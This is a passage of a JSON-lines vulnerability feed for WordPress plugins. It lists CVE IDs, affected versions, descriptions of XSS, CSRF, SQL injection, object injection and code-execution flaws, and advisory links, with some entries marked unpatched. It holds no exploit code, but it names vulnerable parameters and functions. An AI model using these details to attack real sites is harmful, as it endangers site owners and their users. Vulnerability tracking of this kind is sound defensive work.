porter.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188636\\\/ultimate-post\\\/trunk\\\/classes\\\/Importer.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11884","slug":"wp-photo-text-slider-50","versionImpact":"8.1","description":"The Wp photo text slider 50 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp-photo-slider' shortcode in all versions up to, and including, 8.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-photo-text-slider-50\\\/trunk\\\/wp-photo-text-slider-50.php#L250\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-photo-text-slider-50\\\/trunk\\\/wp-photo-text-slider-50.php#L250\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-photo-text-slider-50\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-photo-text-slider-50\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f98f11da-b0ae-4c00-9708-88d6044abda2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f98f11da-b0ae-4c00-9708-88d6044abda2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12170","slug":"viewmedica","versionImpact":"1.4.15","description":"The ViewMedica 9 plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4.15. This is due to missing or incorrect nonce validation on the 'Viewmedica-Admin' page. This makes it possible for unauthenticated attackers to inject arbitrary SQL queries via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/viewmedica\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/viewmedica\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58209530-9e68-4d2c-a723-e6a164db7f46?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58209530-9e68-4d2c-a723-e6a164db7f46?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12508","slug":"glofox-shortcodes","versionImpact":"2.6","description":"The Glofox Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'glofox' and 'glofox_lead_capture ' shortcodes in all versions up to, and including, 2.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/glofox-shortcodes\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/glofox-shortcodes\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ed59d5b-0922-44e9-98e8-07b91d1f4840?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ed59d5b-0922-44e9-98e8-07b91d1f4840?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13364","slug":"adthrive-ads","versionImpact":"3.6.3","description":"The Raptive Ads plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the site_ads_files_reset() and cls_file_reset() functions in all versions up to, and including, 3.6.3. This makes it possible for unauthenticated attackers to reset the ad and cls files.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/adthrive-ads\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/adthrive-ads\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a08d857-c8be-4ba8-b9fb-eed222a8cd8c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a08d857-c8be-4ba8-b9fb-eed222a8cd8c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0845","slug":"designthemes-core-features","versionImpact":"4.8","description":"The DesignThemes Core Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 4.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/lms-learning-management-system-education-lms-wordpress-theme\\\/7867581\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/lms-learning-management-system-education-lms-wordpress-theme\\\/7867581\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39ea4627-66b2-42a6-913e-04c708491b8d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39ea4627-66b2-42a6-913e-04c708491b8d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8095","slug":"babelz","versionImpact":"1.1.5","description":"The BabelZ  WordPress plugin through 1.1.5 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/56d22ad0-c5f5-488b-bc1f-73188dfc71d2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/56d22ad0-c5f5-488b-bc1f-73188dfc71d2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6814","slug":"booking-x","description":"The Booking X plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the export_now() function in versions 1.0 to 1.1.2. This makes it possible for unauthenticated attackers to download all plugin data, including user accounts, user meta, and PayPal credentials, by issuing a crafted POST request.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-x\\\/tags\\\/1.1.2\\\/admin\\\/class-bookingx-admin.php#L784\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-x\\\/tags\\\/1.1.2\\\/admin\\\/class-bookingx-admin.php#L784\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-x\\\/tags\\\/1.1.2\\\/includes\\\/class-bookingx.php#L322\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-x\\\/tags\\\/1.1.2\\\/includes\\\/class-bookingx.php#L322\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/booking-x\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/booking-x\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a30d572-e086-4b83-8cb7-4cef9a3253bd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a30d572-e086-4b83-8cb7-4cef9a3253bd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-23685","slug":"tlp-portfolio","versionImpact":"2.8.10","description":"Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in RadiusTheme Portfolio \u2013 WordPress Portfolio plugin <= 2.8.10 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/tlp-portfolio\\\/wordpress-portfolio-wordpress-portfolio-plugin-plugin-2-8-10-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/tlp-portfolio\\\/wordpress-portfolio-wordpress-portfolio-plugin-plugin-2-8-10-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2492","slug":"querywall","versionImpact":"1.1.1","description":"The QueryWall: Plug'n Play Firewall WordPress plugin through 1.1.1 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fa7c54c2-5653-4d3d-8163-f3d63272c050\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fa7c54c2-5653-4d3d-8163-f3d63272c050\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6986","slug":"embedpress","description":"The EmbedPress \u2013 Embed PDF, YouTube, Google Docs, Vimeo, Wistia Videos, Audios, Maps & Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's embed_oembed_html shortcode in all versions up to 3.9.5 (exclusive) due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ceae0115-268c-401b-876b-3477d10c10e6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ceae0115-268c-401b-876b-3477d10c10e6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/embedpress\\\/trunk\\\/EmbedPress\\\/Shortcode.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/embedpress\\\/trunk\\\/EmbedPress\\\/Shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3014595%40embedpress&new=3014595%40embedpress&sfp_email=&sfph_mail=#file11\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3014595%40embedpress&new=3014595%40embedpress&sfp_email=&sfph_mail=#file11\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7064","slug":"auxin-elements","versionImpact":"2.15.2","description":"The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.15.2 via deserialization of untrusted input from the vulnerable 'id' parameter in the 'auxin_template_control_importer' function. This makes it possible for authenticated attackers able to upload a separate PHAR payload as an image file to inject a PHP Object, though the action itself is available to subscribers. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0882205-3037-4ada-9e44-ddd55d88fcb1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0882205-3037-4ada-9e44-ddd55d88fcb1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/auxin-elements\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/auxin-elements\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2953","slug":"luckywp-table-of-contents","versionImpact":"2.1.4","description":"The LuckyWP Table of Contents plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple parameters in versions up to, and including, 2.1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with Contributor permissions and above to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b12c0524-d991-4f96-8646-f4203880558c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b12c0524-d991-4f96-8646-f4203880558c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/luckywp-table-of-contents\\\/tags\\\/2.1.4\\\/plugin\\\/PostSettings.php#L207\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/luckywp-table-of-contents\\\/tags\\\/2.1.4\\\/plugin\\\/PostSettings.php#L207\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/luckywp-table-of-contents\\\/tags\\\/2.1.4\\\/plugin\\\/PostSettings.php#L209\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/luckywp-table-of-contents\\\/tags\\\/2.1.4\\\/plugin\\\/PostSettings.php#L209\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/luckywp-table-of-contents\\\/tags\\\/2.1.4\\\/plugin\\\/PostSettings.php#L210\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/luckywp-table-of-contents\\\/tags\\\/2.1.4\\\/plugin\\\/PostSettings.php#L210\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9938","slug":"bounce-handler-mailpoet","versionImpact":"1.3.21","description":"The Bounce Handler MailPoet 3 plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.3.21 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2c6fefe-f6f3-44ce-906c-abad717840d5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2c6fefe-f6f3-44ce-906c-abad717840d5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bounce-handler-mailpoet\\\/trunk\\\/includes\\\/class-mailpoet-bounce-log.php#L193\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bounce-handler-mailpoet\\\/trunk\\\/includes\\\/class-mailpoet-bounce-log.php#L193\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11897","slug":"mightyforms","versionImpact":"1.3.9","description":"The Contact Form, Survey & Form Builder \u2013 MightyForms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'mightyforms' shortcode in all versions up to, and including, 1.3.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mightyforms\\\/trunk\\\/shortcode.php#L13\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mightyforms\\\/trunk\\\/shortcode.php#L13\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mightyforms\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mightyforms\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c691e469-3bd2-415d-8feb-9ae94aeaf339?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c691e469-3bd2-415d-8feb-9ae94aeaf339?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11883","slug":"connatix-video-embed","versionImpact":"1.0.5","description":"The Connatix Video Embed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cnx_script_code' shortcode in all versions up to, and including, 1.0.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/connatix-video-embed\\\/tags\\\/1.0.5\\\/connatix-video-embed.php#L219\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/connatix-video-embed\\\/tags\\\/1.0.5\\\/connatix-video-embed.php#L219\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89512190-a0fe-495a-9dda-8d8540a5325c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89512190-a0fe-495a-9dda-8d8540a5325c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12159","slug":"muzaara-adwords-optimize-dashboard","versionImpact":"3.1","description":"The Optimize Your Campaigns \u2013 Google Shopping \u2013 Google Ads \u2013 Google Adwords plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 3.1 due to the print_php_information.php being publicly accessible. This makes it possible for unauthenticated attackers to extract sensitive configuration data that can be leveraged in another attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/muzaara-adwords-optimize-dashboard\\\/trunk\\\/lib\\\/muzaara\\\/lib\\\/google-ads-php\\\/scripts\\\/print_php_information.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/muzaara-adwords-optimize-dashboard\\\/trunk\\\/lib\\\/muzaara\\\/lib\\\/google-ads-php\\\/scripts\\\/print_php_information.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfeca343-c796-45d5-a71d-8211d8b38b3e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfeca343-c796-45d5-a71d-8211d8b38b3e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12275","slug":"canvasflow","versionImpact":"1.5.5","description":"The Canvasflow for WordPress plugin through 1.5.5 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca5bf8bd-a124-4088-a267-fd8a01cb4f4a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca5bf8bd-a124-4088-a267-fd8a01cb4f4a\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca5bf8bd-a124-4088-a267-fd8a01cb4f4a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca5bf8bd-a124-4088-a267-fd8a01cb4f4a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8094","slug":"ntzantispam","versionImpact":"2.0e","description":"The Ntz Antispam WordPress plugin through 2.0e does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cacfde9e-c6fa-4918-8e59-461b67b5e979\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cacfde9e-c6fa-4918-8e59-461b67b5e979\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4429","slug":"gearside-developer-dashboard","versionImpact":"1.0.72","description":"The Gearside Developer Dashboard WordPress plugin through 1.0.72 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a487f5c9-7db6-4427-8d95-17acbfd49fd2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a487f5c9-7db6-4427-8d95-17acbfd49fd2\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a487f5c9-7db6-4427-8d95-17acbfd49fd2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a487f5c9-7db6-4427-8d95-17acbfd49fd2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6787","slug":"smart-docs","versionImpact":"1.1.0","description":"The Smart Docs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'smartdocs_search' shortcode in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smart-docs\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smart-docs\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70c41a28-982f-43e6-9415-3a2d996959f3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70c41a28-982f-43e6-9415-3a2d996959f3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1840","slug":"spotify-play-button-for-wordpress","versionImpact":"2.07","description":"The Sp*tify Play Button for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 2.07 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/308f6887-7c1c-4efd-85e2-b71bb6d26dab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/308f6887-7c1c-4efd-85e2-b71bb6d26dab?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2893653%40spotify-play-button-for-wordpress%2Ftrunk&old=2870608%40spotify-play-button-for-wordpress%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2893653%40spotify-play-button-for-wordpress%2Ftrunk&old=2870608%40spotify-play-button-for-wordpress%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2835","slug":"wpdirectorykit","versionImpact":"1.2.3","description":"The WP Directory Kit plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'search' parameter in versions up to, and including, 1.2.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/847f1c00-0e8f-4d38-84af-fe959e2efe5c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/847f1c00-0e8f-4d38-84af-fe959e2efe5c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917413\\\/wpdirectorykit\\\/trunk\\\/application\\\/views\\\/wdk_messages\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917413\\\/wpdirectorykit\\\/trunk\\\/application\\\/views\\\/wdk_messages\\\/index.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/Don-H50\\\/wp-vul\\\/blob\\\/main\\\/WDK-xss-exploit.md\",\"name\":\"https:\\\/\\\/github.com\\\/Don-H50\\\/wp-vul\\\/blob\\\/main\\\/WDK-xss-exploit.md\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4141","slug":"wp-ultimate-csv-importer","versionImpact":"7.9.8","description":"The WP Ultimate CSV Importer plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 7.9.8 via the '->cus2' parameter. This allows authenticated attackers with author-level permissions or above, if the administrator previously grants access in the plugin settings, to create a PHP file and execute code on the server. The author resolved this vulnerability by removing the ability for authors and editors to import files, please note that this means php file creation is still allowed for site administrators, use the plugin with caution.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2944635\\\/wp-ultimate-csv-importer\\\/trunk\\\/wp-ultimate-csv-importer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2944635\\\/wp-ultimate-csv-importer\\\/trunk\\\/wp-ultimate-csv-importer.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ultimate-csv-importer\\\/tags\\\/7.9.6\\\/importExtensions\\\/ImportHelpers.php#L205\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ultimate-csv-importer\\\/tags\\\/7.9.6\\\/importExtensions\\\/ImportHelpers.php#L205\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4fe8b1f-da1c-4f94-9ab4-272766b488c3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4fe8b1f-da1c-4f94-9ab4-272766b488c3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6981","slug":"wp-sms","versionImpact":"6.5","description":"The WP SMS \u2013 Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc plugin for WordPress is vulnerable to SQL Injection via the 'group_id' parameter in all versions up to, and including, 6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This can leveraged to achieve Reflected Cross-site 